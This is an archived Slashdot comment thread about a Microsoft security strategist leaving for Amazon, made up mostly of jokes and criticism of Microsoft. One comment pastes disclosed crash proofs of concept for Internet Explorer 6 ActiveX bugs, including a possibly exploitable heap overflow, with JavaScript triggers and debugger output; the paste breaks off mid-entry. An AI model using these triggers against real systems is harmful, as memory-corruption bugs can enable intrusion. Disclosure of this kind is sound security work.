Slashdot Mirror
MS Security Guru Leaves for Amazon.com
Rocky Mann writes "Jesper Johansson, a security guru for Microsoft, is leaving the company to join Amazon.com. Johansson served for some five years as a 'senior security strategist', and is considered one of the world's leading experts on how to protect installations of Windows." From the article: "Johansson is also an advocate for the use of safe-passwords techniques in the enterprise. At the height of the WMF zero-day attacks earlier in 2006, Johansson offered measured advice on the use of unofficial patches and he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely."
...he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely.
Kind of says it all doesn't it.
"Kittens give Morbo gas!"
At some point in the conversation Mr. Ballmer said: "Just tell me it's not Amazon." I told him it was Amazon.
At that point, Mr. Ballmer picked up a chair and threw it across the room hitting a table in his office. Mr. Ballmer then said: "I'm going to fucking bury that company, I have done it before, and I will do it again. I'm going to fucking kill Amazon."
Thereafter, Mr. Ballmer resumed trying to persuade me to stay....Among other things, Mr. Ballmer told me that "Amazon is not a real company. It's a library."
I can see how Scoble and Gates leaving MS should make slashdot, but this is just random fluff. Slashdot loves reporting that (not really) important people are leaving Microsoft for Google, or apparently Amazon.
Do we get to also see the random people who leave Google and Amazon.com? Mod me down if you like, but I don't really see how this is relevent news.
...he signed a Non-Compete Agreement with Microsoft so he's working as front door security.
Thanks god it is not Google. MS chairs will probably thank him publically.
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
...my Amazon account.
"How to Do Nothing," kids activities, back in print!
the smartest man alive! "...and is considered one of the world's leading experts on how to protect installations of Windows."
The Tech Terminal
Microsoft has quite a few Gurus.. is there a reason that this one guy is news?
Isn't that an oxmoron... kinda like military intelligence?
Thank you, thank you. I'll be here all night, please tip the waiter...
This sig is intentionally left blank
chair jokes? still funny after what 2yrs I do not not remember?
Non Compete jokes oh man hold on let me get my pills your killing me.
and a bunch of "secure windows" isn't that an oxymoron jokes...
no really it is very funny.
actually I am happy to see you, however that is in fact a banana in my pocket.
I attended a small security lecture with about 25 people, he was the presenter. He walked through some real time hacks against Microsoft products that he had running in VPC. Nothig to stunning for me, but most of the people there had no clue about security so they were all blown away. I didn't see anything special. One thing of note that amused me, was the bumper sticker on his laptop that read "My other box is your Linux box". I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...
If you run his name on Amazon you will find his book, which is really very good if you are a Windows Server Admin and are new to the security game.
You only have three options: /.". God, that would be a red pill for you /. still exists in its current form in the morning /. blue pill, code for nothing and post bull for the rest of the day
- you think you've entred some SeriousGeekSanctuary.com??? You suddenly realize "it is a
- feed your kitten and pretend nothing happened, go to sleep and hope it will go away. No pill and you wake up hungry, while
- go with the rest of us and take the
But here it is "IT IS A SLASHDOT, WHADA'YA EXPECT???"
p.s. since you were agreeing with being modded down, your wish come true. I on the other hand agree on being modded up.
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
Just moving from one marketing gig to another.
He was done securing vista and there just wasn't anything challenging left at Microsoft for him to work on.
He's moving to Amazon to implement Trustworthy One-Clicking(TM).
His real reason for leaving: he's looking for the one, the only one that's build like an Amazon...and he doesn't want people to buy their books from a brick house.
Hey, does Amazon sell office chairs?
I guess when you've thrown enough money at the problem and it still hasnt been solved, the next logical thing would be chairs. Either that or developers.
Microsofts Demise: See Titanic.
Titanic: 2nd worst civilian disaster next to the demise of Microsoft.
Tom
Someday, I'll have a real sig.
but it seems that while rotecting Amazon's internal network, along with the protocol to customers (which presumably uses SSL), is admittedly a huge task, one can rely heavily on firewalls, server configurations, protocols, and physical security policies that can be standardized throughout the company.
While the ongoing task of securing hundreds of millions of desktops and servers owned and operated at customer sites is orders of magnitude more formidable. Maybe he didn't want to be around when the Vista hit the fan?
If I were Ballmer I would try to hire Theo de Raadt to replace him.
And if I were de Raadt, I'd reject the offer unless Microsoft opensources win32.
And if I were the customer I would not buy Windows at all.
Oh wait...
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
Any tech guru leaving Google, Yahoo!, Amazon, YouTube, or any other innovative company, to go work for Microsoft, *would* be breaking news. Hate to say it, but it ain't happenin'. Somebody, prove me wrong.
it's a blue bright blue Saturday hey hey
Circumcision is child abuse.
Bad luck Amazon!
Summation 2
Cliche M$ humor attempt #1:
(#1a)
Amazon? Amazon? WTF?
I can imagine it now:
Some random M$: Exect #1
Amazon has enjoyed a moderate amount of success, therefore online book, CD, and video sales is obviously Microsoft's space. How dare they take food off of Microsoft's table by doing business in an industry kinda-sorta-maybe related to anything we at Microsoft do? And what the hell, now they're stealing our talent to do it? We own that space, we're in that space (maybe. somehow, in a future. Maybe we'll buy them out! Hey wait a second, we have a division called Microsoft Press, don't we? I think we can sue Mr. Johansson and put a stop to our competitors' stealing our employee!
Ballmer:
I'm going to F***ING KILL AMAZON! I'LL KILL THEM AND BURY THEM! I've done it before!
(meanwhile, Microsoft's new AI-equipped motorized chairs, which have been provided due to Ballmer's costing the company millions in damaged chairs and the need to avoid these recurring losses, detect Ballmer's impending annurism quickly roll out of the room)
(#1b)Bill Gates:
Meh. I've had my day of being a right ass. I couldn't be bothered being a hater any more. Besides, I'm quitting soon. *donates another $10bil to save the children to appease conscience*
Cliche M$ humor attempt #2:
A Microsoft Security expert? You mean, HE'S the reason Microsoft Windows is so "secure?"
Just what the hell is Amazon thinking?
(I kid, on both counts)
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
Microsoft no longer has a coherent vision or a clear strategy. They waste their time trying to attack on several fronts, and in the meantime, their core is abandoned. Vista could have been a technological brakthrough, but they let this opportunity slip. Instead of trying to innovate, they try to emulate others and have been failing miserably. In the past, if only rumor about Microsoft developing a MsPod emerged, this would have a clear effect on Apple stocks. Nowadays, they can formally anounce they are working in it and people will only nod their heads, because they are increasingly losing credibility. They spent millions with IE, had sucessive legal problems because of it, not to mention the security problems, and still they can't face the fact that they could profit from internet making their OS better. Cisco makes money selling routers, why microsoft can't see that they can profit from the internet by having a rock solid, fast and easy-to-use OS? Why do they think that they need to "kill" google, or "kill" iPOd on their own arenas to survive? Instead they should have invested all this money making their core businness stronger, by making their OS the best OS for developers and user alike, by making people "wanting" to use Windows instead of people "Having" to run windows. After that they could even afford the luxury of competing with the iPod or with Google, but not the way they are doing now.
Your ad could be here!
... as Amazon gets pwned for being completely insecure.
Honestly, I don't understand why people we've never heard of defecting from Microsoft is newsworthy anymore.
Looks like open season on Amazon...
"We are all geniuses when we dream"
- E.M. Cioran
Jesper to Mom: It's part of my job, Mom. I fly first class, snip people's ethernet cable, and they pay me well...
Amazon to Jesper: ...(so far).
AMAZON is 94% UNIX/LINUX shop
AMAZON: Where groceries are better than Vista
I remember this guy, I ridiculed him heartily in my blog after he bitched about the way non-Microsoft people handled the WMF exploit.
I don't know why he is leaving. Being a "Microsoft Security Guru" is apparently a job with no duties. See this movie: 144,000 known viruses for Microsoft operating systems.
It appears to me that Microsoft products are deliberately not secure. Because Microsoft has a temporary monopoly, Microsoft makes more money when its product is more defective.
One of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, and Microsoft is able to do what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XPSP2 system. This bug is interesting because a small heap overflow occurs eachtime this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULLpointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Table.Frameset
The follo
...you must be new here ;)
MS Security Guru
[snigger]
spoonerize "magic trackpad"
If I had been a 'senior security strategist' at Microsoft for the last five years... I'd leave that off of my resume!
Thanks for your excellent discussion of the issues
Given how Microsoft's security track record has gone, I think I shall take my online books business to a new vendor.
Skot Nelson music is my saviour / i was maimed by rock and roll
Free crap from Amazon this Christmas!
i didn't know there was such a thing
http://www.ronpaul2008.com/ Ron Paul for President 2008 http://www.infowars.com/
"Mod me down if you like, but I don't really see how this is relevent news."
It was news to me that Microsoft even HAD a "security strategist".
I wonder what he did all day. Review the 10 year backlog of e-mail warning that active scripting might be a gaping security hole?
I did not know Microsoft had a security expert!
Religion is the main cause of atheism.
This seems like a demotion to me. The security problems Amazon.com faces can't possibly be as big as the security problems Microsoft faces. It is relatively easy to harden a server farm, compared to making an operating system that can stay reasonably secure even when run by novices and below.
I went to Jesper's presentation at Auscert in 2005 where he came out with the stunning "write down your passwords" revelation. (Previously espoused by Bruce Schneier years ago.)
.JPG processing vulnerability in windows and examining it. He stated at one point this can't have been reviewed as a very basic buffer overflow was missed.
His talk was an hour of how to jam as many funny pictures into a talk and attempt to get "in" with the geek crowd by poking fun at the security establishment.
It was kind pathetic.
He then went on to attend a Thor Larholm presentation and attack Thor at the end of it. It was stupid and untidy. I thought Thor handled it well. Jesper lost all respect from me @ that point.
BTW the attack was basically Thor going through some old
Jesper then piped up and stated it was reviewed "because I reviewed it." Blah blah blah.
Jesper and another MS Security manager (I think there are about 700 managers personally responsible for security @ Microsoft.) continued the attack making themselves look rather silly and Thor look very balanced and well mannered.
"My other box is your Linux box"
That's a stupid thing for him to say. It shows his malicious intentions and his failure to carry through.
80% of the world's spam comes from security problems in his platform. This guy's work is either incompetent or hampered by others. Blaming it on his users is not good enough while Mac, Linux and Sun users are blissfully unaware of the Windoze swamp.
To date there are no such problems with free software, no worms, no trojans, ad servers, nothing, naada, zip. Sure, that dick might be able to root my particular box if he tried hard enough. So what? I can clean it up in twenty minutes and I've got enough redundancy and back ups to not even notice. Unlike the pay per play Windoze world, I can have live backups on multiple machines without losing my shirt.
All that silly bumper sticker shows is his intent to break something that works better than M$ junk. So far all effort in that direction have failed. Banks, search engines and other high profile chair targets continue working as usual, unless some M$ net storm messes things up.
I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...
He was probably thinking, "My Windows bot net is bigger than yours. "
Friends don't help friends install M$ junk.
If so, I'll bet he's looking forward to a job that's possible.
Friends don't help friends install M$ junk.
Maybe he should get together with the Enron accounting guru.
I went to a MS security seminar where he was the presenter. He did a really amazing job and cracked a lot of MS jokes. Showed the lack of security in MS products and where it really wasn't as big as it was hyped to be. He was a great presenter and a nice guy. Helped me with some questions. MS lost a good employee here.
Tim Smith - Ramblings from Nerd Land
By your logic, anyone leaving M$ is unimportant. Maybe they even cease to exist.
Patents Drive Free Software as Hurricanes Drive Construction Industry
Sweet! Free books and movies!
At the time I'm posting, I counted the occurrences of the word "chair" in the visible threads (threshold: 1).
It's 7 out of 72 threads. A clean 10% of posters give credit to Mr. Ballmer habits.
Microsoft has a security guru? What OS does he use?
It's news to me.
I can't stand it when people act like they were forced to read a news article. Even worse, that they act like they were forced to waste their time commenting on it.
GET A LIFE
"is considered one of the world's leading experts on how to protect installations of Windows."
And Amazon wants this guy?
Time to stop using your credit card at Amazon.
Yeah, this is snark. Sue me.
Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
I'm an advocate for safe-lock techniques on automobiles. Does that make me an automobile security expert?